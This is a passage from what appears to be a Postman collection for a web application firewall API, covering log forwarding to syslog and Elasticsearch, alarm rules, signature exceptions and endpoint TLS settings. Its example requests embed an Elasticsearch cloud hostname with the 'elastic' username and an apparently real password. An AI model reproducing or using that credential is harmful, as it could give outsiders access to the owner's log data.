\"server_type\": {\n                            \"description\": \"The type of the server, should be 'syslog' here.\",\n                            \"type\": \"string\",\n                            \"enum\": [\"syslog\", \"elasticsearch\"]\n                        },\n                        \"syslog_type\": {\n                            \"description\": \"The type of the log content, should be 'alog' here.\",\n                            \"type\": \"string\",\n                            \"enum\": [\"alog\", \"elog\"]\n                        },\n                        \"address\": {\n                            \"description\": \"The syslog server address or domain\",\n                            \"type\": \"string\"\n                        },\n                        \"port\": {\n                            \"description\": \"The syslog server listened port.\",\n                            \"type\": \"int\"\n                        },\n                        \"protocol\": {\n                            \"description\": \"Protocol to connect to syslog server.\",\n                            \"type\": \"string\",\n                            \"enum\": [\"TCP\", \"UDP\",\"SSL\"],\n                            \"default\": \"UDP\"\n                        },\n                        \"cert_signed\": {\n                            \"description\": \"Use customer cert(0) or default self-signed cert (1)\",\n                            \"type\": \"string\",\n                            \"enum\": [0, 1],\n                            \"default\": \"1\"\n                        },\n                        \"pkey\": {\n                            \"description\": \"Private key of cert\",\n                            \"type\": \"string\"\n                        },\n                        \"pkey_passwd\": {\n                            \"description\": \"Password of pkey\",\n                            \"type\": \"string\"\n                        },\n                        \"type\": {\n                            \"description\": \" The type of the log template\",\n                            \"type\": \"string\",\n                            \"enum\": [\"default\", \"splunk\", \"cef0_arcsight\", \"azure_oms\", \"leef1_qradar\", \"custom\"],\n                            \"default\": \"default\"\n                        },\n                        \"value\": {\n                            \"description\": \"The template content of the corresponding type\",\n                            \"type\": \"string\"\n                        },\n                        \"facility\": {\n                            \"description\": \"The Syslog Facility value\",\n                            \"type\": \"string\",\n                            \"enum\": [\"local0\", \"local1\",\"local2\", \"local3\",\"local4\", \"local5\",\"local6\", \"local7\"],\n                            \"default\": \"local0\"\n                        },\n                        \"severity\": {\n                            \"description\": \"The Syslog Severity value\",\n                            \"type\": \"string\",\n                            \"enum\": [\"Emergency\", \"Alert\", \"Critical\", \"Error\", \"Warning\", \"Notice\", \"Information\", \"Debug\"],\n                            \"default\": \"Critical\"\n                        }\n                    }\n                },\n                \"elastic-server-name\": {\n                    \"type\": \"object\",\n                    \"required\": [\"server_type\", \"syslog_type\", \"address\", \"port\", \"username\", \"password\"],\n                    \"properties\": {\n                        \"server_type\": {\n                            \"description\": \"The type of the server, should be 'elasticsearch' here.\",\n                            \"type\": \"string\",\n                            \"enum\": [\"syslog\", \"elasticsearch\"]\n                        },\n                        \"syslog_type\": {\n                            \"description\": \"The type of the log content, should be 'alog' here.\",\n                            \"type\": \"string\",\n                            \"enum\": [\"alog\", \"elog\"]\n                        },\n                        \"address\": {\n                            \"description\": \"The elasticsearch server address or domain\",\n                            \"type\": \"string\"\n                        },\n                        \"port\": {\n                            \"description\": \"The elasticsearch server listened port.\",\n                            \"type\": \"int\"\n                        },\n                        \"username\": {\n                            \"description\": \"The username of the elasticsearch server.\",\n                            \"type\": \"string\"\n                        },\n                        \"password\": {\n                            \"description\": \"The password of the elasticsearch server.\",\n                            \"type\": \"string\"\n                        }\n                    }\n                }\n            }\n        }\n    }\n}\n\n</code></pre>\n<p>After you update the configuration, the API will return successfully.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","log-setting"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"6dea483e-d78b-4cbe-92ee-157f8fcb6fe8","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n\t\"attackCfg\": {\n\t    \"_status\": \"enable\",\n\t    \"endpoint-setting\": {\n\t    \t\"syslog-server-name\": {\n\t    \t\t\"address\": \"1.1.1.1\",\n\t    \t\t\"port\": 512,\n\t    \t\t\"protocol\": \"TCP\",\n\t    \t\t\"cert_signed\": 0,\n\t    \t\t\"cert\": \"cert content\",\n\t    \t\t\"pkey\": \"key content\",\n\t    \t\t\"pkey_passwd\": \"123456\",\n\t    \t\t\"type\": \"default\",\n\t    \t\t\"value\": \"cat=attack date_time={{dt}} user_id={{uid}} ep_id={{eid}} app_name={{an}} ep_region={{er}} ep_domain={{ed}} src_ip={{si}} src_port={{sp}} backend_service={{bs}} dst_port={{dp}} srccountry={{sc}} service={{svc}} action={{act}} main_type={{mt}} sub_type={{st}} threat_level={{tl}} threat_weight={{tw}} http_host={{hh}} http_url={{hu}} http_version={{hv}} http_method={{hm}} http_agent={{ha}} http_refer={{hr}} length={{lt}} signature_id={{sid}} signature_cve_id={{sci}} owasp_top10={{ott}} msg={{msg}}\",\n\t    \t\t\"facility\": \"local1\",\n\t    \t\t\"severity\": \"Critical\",\n\t    \t\t\"syslog_type\": \"alog\"\n\t    \t},\n\t\t\t\"elastic-server-name\": {\n\t\t\t\t\"server_type\": \"elasticsearch\",\n\t\t\t\t\"syslog_type\": \"alog\",\n\t\t\t\t\"address\":\"f459405714614c5a8624bdc20f1180b1.ap-southeast-1.aws.found.io\",\n\t\t\t\t\"port\": 9243,\n\t\t\t\t\"username\":\"elastic\",\n\t\t\t\t\"password\": \"suFdYOFiU7FuFfBxoN2gHcuA\",\n\t\t\t\t\"user_id\":\"bba91d22-ca28-11e9-b785-2e109146634c\",\n\t\t\t\t\"ep_id\":\"5610756959\"\n\t\t\t}\n\t    }\n\t},\n    \"enableAlarm\": true,\n\t\"alarmMode\": \"basic\",\n\t\"basicRule\": {\n\t\t\"customNotified\": true,\n\t    \"name\": \"Basic Alarm\",\n\t    \"threshold\": \"Critical\",\n\t    \"notified\": \"user@demo.com\"\n\t},\n\t\"advancedRules\": [{\n\t\t\"customNotified\": true,\n\t\t\"notified\": \"user2@example.com\",\n\t    \"name\": \"demo_rule_3\",\n\t    \"threshold\": 800,\n\t    \"filters\": [{\n\t    \t\"field\": \"main_type\",\n\t        \"value\": \"Known Attacks\",\n\t        \"operator\": \"is_not\"\n\t    }],\n\t    \"enabled\": true\n\t}, {\n\t\t\"customNotified\": false,\n\t    \"notified\": null,\n\t    \"name\": \"demo_rule_2\",\n\t    \"threshold\": 200,\n\t    \"filters\": [ {\n\t    \t\"field\": \"src_ip\",\n\t        \"startValue\": \"2.2.2.2\",\n\t        \"endValue\": \"2.2.2.240\",\n\t        \"operator\": \"is_not_between\"\n\t    } ],\n\t    \"enabled\": true,\n\t    \"defaultNotified\": \"user@example.com\"\n\t}, {\n\t\t\"customNotified\": false,\n\t    \"notified\": null,\n\t    \"name\": \"demo_rule_1\",\n\t    \"threshold\": 1000,\n\t    \"filters\": [ {\n\t    \t\"field\": \"http_agent\",\n\t        \"value\": \"chrome\",\n\t        \"operator\": \"is\"\n\t    }],\n\t    \"enabled\": false,\n\t    \"defaultNotified\": \"user@example.com\"\n   }],\n    \"logMaskRules\": [\n        {\n            \"rule_type\": \"URL\",\n            \"name_pattern\": \"\",\n            \"value_pattern\": \"password=.*\"\n        },\n        {\n            \"rule_type\": \"Parameter\",\n            \"name_pattern\": \"password\",\n            \"value_pattern\": \".*\"\n        },\n        {\n            \"rule_type\": \"Cookie\",\n            \"name_pattern\": \"password\",\n            \"value_pattern\": \".*\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/log-setting","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","log-setting"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Logs settings were changed successfully.\"\n}"},{"id":"c1c78523-8557-49c6-99cc-9aaf1ec24aa2","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Accept","type":"text","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n\t\"attackCfg\": {\n\t    \"_status\": \"enable\",\n\t    \"endpoint-setting\": {\n\t    \t\"syslog-server-name\": {\n\t    \t\t\"address\": \"1.1.1.1\",\n\t    \t\t\"port\": 512,\n\t    \t\t\"protocol\": \"TCP\",\n\t    \t\t\"cert_signed\": 0,\n\t    \t\t\"cert\": \"cert content\",\n\t    \t\t\"pkey\": \"key content\",\n\t    \t\t\"pkey_passwd\": \"123456\",\n\t    \t\t\"type\": \"default\",\n\t    \t\t\"value\": \"cat=attack date_time={{dt}} user_id={{uid}} ep_id={{eid}} app_name={{an}} ep_region={{er}} ep_domain={{ed}} src_ip={{si}} src_port={{sp}} backend_service={{bs}} dst_port={{dp}} srccountry={{sc}} service={{svc}} action={{act}} main_type={{mt}} sub_type={{st}} threat_level={{tl}} threat_weight={{tw}} http_host={{hh}} http_url={{hu}} http_version={{hv}} http_method={{hm}} http_agent={{ha}} http_refer={{hr}} length={{lt}} signature_id={{sid}} signature_cve_id={{sci}} owasp_top10={{ott}} msg={{msg}}\",\n\t    \t\t\"facility\": \"local1\",\n\t    \t\t\"severity\": \"Critical\",\n\t    \t\t\"server_type\": \"syslog\",\n\t    \t\t\"syslog_type\": \"alog\"\n\t    \t},\n\t\t\t\"elastic-server-name\": {\n\t\t\t\t\"server_type\": \"elasticsearch\",\n\t\t\t\t\"syslog_type\": \"alog\",\n\t\t\t\t\"address\":\"f459405714614c5a8624bdc20f1180b1.ap-southeast-1.aws.found.io\",\n\t\t\t\t\"port\": 9243,\n\t\t\t\t\"username\":\"elastic\",\n\t\t\t\t\"password\": \"suFdYOFiU7FuFfBxoN2gHcuA\",\n\t\t\t\t\"user_id\":\"bba91d22-ca28-11e9-b785-2e109146634c\",\n\t\t\t\t\"ep_id\":\"5610756959\"\n\t\t\t}\n\t    }\n\t},\n    \"enableAlarm\": true,\n\t\"alarmMode\": \"basic\",\n\t\"basicRule\": {\n\t\t\"customNotified\": true,\n\t    \"name\": \"Basic Alarm\",\n\t    \"threshold\": \"Critical\",\n\t    \"notified\": \"user@demo.com\"\n\t},\n\t\"advancedRules\": [{\n\t\t\"customNotified\": true,\n\t\t\"notified\": \"user2@example.com\",\n\t    \"name\": \"demo_rule_3\",\n\t    \"threshold\": 800,\n\t    \"filters\": [{\n\t    \t\"field\": \"main_type\",\n\t        \"value\": \"Known Attacks\",\n\t        \"operator\": \"is_not\"\n\t    }],\n\t    \"enabled\": true\n\t}, {\n\t\t\"customNotified\": false,\n\t    \"notified\": null,\n\t    \"name\": \"demo_rule_2\",\n\t    \"threshold\": 200,\n\t    \"filters\": [ {\n\t    \t\"field\": \"src_ip\",\n\t        \"startValue\": \"2.2.2.2\",\n\t        \"endValue\": \"2.2.2.240\",\n\t        \"operator\": \"is_not_between\"\n\t    } ],\n\t    \"enabled\": true,\n\t    \"defaultNotified\": \"user@example.com\"\n\t}, {\n\t\t\"customNotified\": false,\n\t    \"notified\": null,\n\t    \"name\": \"demo_rule_1\",\n\t    \"threshold\": 1000,\n\t    \"filters\": [ {\n\t    \t\"field\": \"http_agent\",\n\t        \"value\": \"chrome\",\n\t        \"operator\": \"is\"\n\t    }],\n\t    \"enabled\": false,\n\t    \"defaultNotified\": \"user@example.com\"\n   }]\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/log-setting","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","log-setting"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Request unauthorized\"\n}"}],"_postman_id":"1a089701-6d3f-490d-9cde-5e3ed65e8929"},{"name":"Get Exception","id":"39d2a56c-ce4c-48d3-b914-61d2dda141ad","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/signatureexception","description":"<p>Get the information of signature exceptions.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","signatureexception"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"2d7f7332-2936-455f-ae2e-3e32418fde73","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/SignatureException","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","SignatureException"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Forbidden","code":403,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 17 May 2019 06:36:40 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"20c1fb72-786e-11e9-a758-a5a081e79c42"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"AccessDeniedException"},{"key":"x-amz-apigw-id","value":"Z0JyyGOtoAMFebQ="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"HTTP method, resources or permissions not supported\"\n}"},{"id":"37f81a5f-7693-4b4b-94e4-e66142ea9304","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/SignatureException","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","SignatureException"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 17 May 2019 03:22:04 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"181"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"f18a88e9-7852-11e9-ac33-752e9d36cdc3"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"ZztSeEfWoAMFzoA="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cde28dc-5538849446450df4ce99ed30;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": [\n        {\n            \"name\": \"1\",\n            \"signature_id\": \"010000063\",\n            \"match-target\": \"URI\",\n            \"value\": \"\\\"/idan\\\"\",\n            \"operator\": \"STRING_MATCH\",\n            \"concatenate-type\": \"OR\"\n        }\n    ]\n}"}],"_postman_id":"39d2a56c-ce4c-48d3-b914-61d2dda141ad"},{"name":"Update Exception","id":"bdc2f8db-c0c9-458b-9b53-c1c965b5074b","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"exception rule\": {\n        \"signature_name\":\"Cross Site Scripting\",\n        \"signature_id\":\"010100063\",\n        \"url\": {\"value\": \"/abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"},\n        \"parameter\": {\"value\": \"abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"},\n        \"cookie\": {\"value\": \"abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"}\n    }\n}"},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/SignatureException","description":"<p>Update the information of exception rule.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"required\": [\"exception rule\"],\n    \"properties\": {\n     \"exception rule\": {\n       \"description\": \"The exception rule\",\n       \"type\": \"object\",\n       \"required\": [\"signature_name\", \"signature_id\"],\n       \"properties\": {\n           \"signature_name\": {\n               \"description\": \"The attack category value\",\n               \"type\": \"string\"\n           },\n           \"signature_id\": {\n               \"description\": \"The signature ID\",\n               \"type\": \"string\",\n               \"maxLength\": 9,\n               \"minLength\": 9\n           },\n           \"url\": {\n                 \"type\": \"object\",\n                 \"required\": [\"value\"],\n                 \"properties\": {\n                     \"operator\": {\n                        \"description\": \"Select STRING_MATCH to match the URL of requests with a literal URL or select REGEXP_MATCH to match the URL of requests with a regular epression\",\n                        \"type\": \"string\",\n                        \"enum\": [\"REGEXP_MATCH\", \"STRING_MATCH\"],\n                        \"default\": \"STRING_MATCH\"\n                    },\n                    \"value\": {\n                        \"description\": \"The value of Request URL\",\n                        \"type\": \"string\",\n                        \"maxLength\": 255,\n                        \"pattern\": \"/.*\"\n                    },\n                    \"status\": {\n                        \"description\": \"Configure to enable or disable Request URL\",\n                        \"type\": \"string\",\n                        \"enum\": [\"enable\", \"disable\"],\n                        \"default\": \"enable\"\n                    }\n                 }\n            },\n            \"parameter\": {\n                 \"type\": \"object\",\n                 \"required\": [\"value\"],\n                 \"properties\": {\n                     \"operator\": {\n                        \"description\": \"Select STRING_MATCH to match the parameter name with a literal URL or select REGEXP_MATCH to match the parameter name with a regular epression\",\n                        \"type\": \"string\",\n                        \"enum\": [\"REGEXP_MATCH\", \"STRING_MATCH\"],\n                        \"default\": \"STRING_MATCH\"\n                    },\n                    \"value\": {\n                        \"description\": \"The parameter name\",\n                        \"type\": \"string\"\n                    },\n                    \"status\": {\n                        \"description\": \"Configure to enable or disable parameter name\",\n                        \"type\": \"string\",\n                        \"enum\": [\"enable\", \"disable\"],\n                        \"default\": \"disable\"\n                    }\n                 }\n            }\n        }\n     }\n   }\n}\n</code></pre>\n<p>After you update the configuration, the API will return successfully.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","SignatureException"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"1510e277-1e1a-489a-aa60-b277eddffdc4","name":"Success","originalRequest":{"method":"PUT","header":[{"description":"Endpoint ID","key":"Accept","value":"application/json"},{"description":"Token","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"authorization","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\n    \"exception rule\": {\n        \"signature_name\":\"Cross Site Scripting\",\n        \"signature_id\":\"010000063\",\n        \"url\": {\"value\": \"/idan\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"},\n        \"parameter\": {\"value\": \"abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"}\n    }\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/SignatureException","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","SignatureException"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 17 May 2019 03:23:58 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"135"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"34fac900-7853-11e9-85c8-014089c889c8"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"ZztkJFp-oAMFkPQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cde294d-e098ae2843456d24966c175c;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"exception rule\": {\n        \"signature_name\": \"Cross Site Scripting\",\n        \"signature_id\": \"010000063\",\n        \"url\": {\"value\": \"/idan\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"},\n        \"parameter\": {\"value\": \"abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"}\n    }\n}"},{"id":"4f2587d3-082b-4f5b-ad3d-89d1412191e2","name":"Parameter Invalid","originalRequest":{"method":"PUT","header":[{"description":"Endpoint ID","key":"Accept","value":"application/json"},{"description":"Token","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"exception rule\": {\n        \"signature_name\":\"Cross Site Scripting\",\n        \"signature_id\":\"010100063\",\n        \"url\": {\"value\": \"/exe\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"},\n        \"parameter\": {\"value\": \"abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"}\n    }\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/SignatureException","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","SignatureException"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 17 May 2019 06:38:37 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"146"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"667a2f93-786e-11e9-b15a-8703289578f3"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"Z0KFEHMUoAMFbxg="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cde56ed-7a29aab4864e8bf403ca157a;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Check failed: {'signature_id': \\\"Signature_id (010100063) didn't exist in signature_rule. 010100063 is not an legal signature-id.\\\"}\"\n}"},{"id":"c4b3c93c-b201-4a87-906d-90623254455b","name":"Fail","originalRequest":{"method":"PUT","header":[{"description":"Endpoint ID","key":"Accept","value":"application/json"},{"description":"Token","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"authorization","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\n    \"exception rule\": {\n        \"signature_name\":\"Cross Site Scripting\",\n        \"signature_id\":\"010000063\",\n        \"url\": {\"value\": \"/abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"},\n        \"parameter\": {\"value\": \"abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"}\n    }\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/SignatureException","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","SignatureException"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Forbidden","code":403,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 17 May 2019 06:37:28 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"3d83203e-786e-11e9-8a27-396bb3a9f845"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"AccessDeniedException"},{"key":"x-amz-apigw-id","value":"Z0J6VG0bIAMF2_g="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"HTTP method, resources or permissions not supported\"\n}"}],"_postman_id":"bdc2f8db-c0c9-458b-9b53-c1c965b5074b"},{"name":"Get Endpoints","id":"cb69f212-da7e-490d-aa42-18102f40df01","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/endpoint","description":"<p>Get the information of endpoints configuration.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","endpoint"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"39f12e9c-9fc3-456a-aa13-f53af591268c","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/endpoint","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","endpoint"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 08:15:27 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"296"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"e92e0f63-86a0-11e9-934e-4145cc4e25d4"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"avtI8EX5IAMFqlg="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf6289f-89f6a2e4ec4ac48237acbe68;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"app_name\": \"wl_us1\",\n    \"ep_cname\": \"wl_us1.timweb-cloud-test.54321.timwebcloud.net\",\n    \"domain_name\": \"www.example.com\",\n    \"extra_domains\": [\"a.example.com\", \"b.example.com\"],\n    \"http_status\": 0,\n    \"http2_status\": 0,\n    \"https_status\": 1,\n    \"ipv6_option\": 0,\n    \"platform\": \"AWS\",\n    \"cert_type\": 0,\n    \"cert_auto_status\": 0,\n    \"ssl_options\": {\n        \"tls_1_0\": 0,\n        \"tls_1_1\": 0,\n        \"tls_1_2\": 0,\n        \"tls_1_3\": 1,\n        \"encryption_level\": 2,\n        \"http_2_https\": 1\n    },\n    \"custom_port\":{\n    \t\"http\":80,\n    \t\"https\":443\n    },\n    \"block_mode\": 1,\n    \"custom_block_page\": \"enable\",\n    \"block_url\": \"/test/block.html\"\n}"},{"id":"6bae56dc-8c55-4c65-a4e9-b6b6933662c0","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/endpoint","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","endpoint"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Unauthorized","code":401,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 08:15:57 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"34"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"faedfa15-86a0-11e9-9e5c-4b813cea4e85"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"UnauthorizedException"},{"key":"x-amz-apigw-id","value":"avtNmHoloAMFqMw="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Request unauthorized\"\n}"}],"_postman_id":"cb69f212-da7e-490d-aa42-18102f40df01"},{"name":"Update Endpoints","id":"0d411e12-39b9-4ae4-97d8-727d36482325","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\n\t\"http_status\": 1,\n\t\"https_status\": 1,\n\t\"http2_status\": 1,\n\t\"extra_domains\": [\"b..example.com\"],\n\t\"cert_type\": 0,\n\t\"ssl_options\": {\n\t\t\"tls_1_0\": 0,\n\t\t\"tls_1_1\": 0,\n\t\t\"tls_1_2\": 0,\n\t\t\"tls_1_3\": 1,\n\t\t\"encryption_level\": 2,\n\t\t\"http_2_https\": 1\n\t},\n\t\"custom_block_page\": \"enable\",\n\t\"block_url\": \"/test.block.html\"\n}"},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/endpoint","description":"<p>Modify endpoints configuration.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"properties\": {\n        \"extra_domains\": {\n            \"description\": \"Extra domains except the domain name\",\n            \"type\": \"array\",\n            \"items\": {\n                \"type\": \"string\"\n            }\n        },\n        \"http_status\": {\n            \"description\": \"Select 0 to disable HTTP, or select 1 to enable HTTP\",\n            \"type\": \"integer\",\n            \"enum\": [0, 1]\n        },\n        \"https_status\": {\n            \"description\": \"Select 0 to disable HTTPS, or select 1 to enable HTTPs\",\n            \"type\": \"integer\",\n            \"enum\": [0, 1]\n        },\n        \"ipv6_option\": {\n            \"description\": \"Select 0 to disable ipv6, or select 1 to enable ipv6\",\n            \"type\": \"integer\",\n            \"enum\": [0, 1]\n        },\n        \"custom_http_port\": {\n            \"description\": \"Select a custom port as http service port\",\n            \"type\": \"integer\"\n        },\n        \"custom_https_port\": {\n            \"description\": \"Select a custom port as https service port\",\n            \"type\": \"integer\"\n        },\n        \"http2_status\": {\n            \"description\": \"Select 0 to disable HTTP2, or select 1 to disable 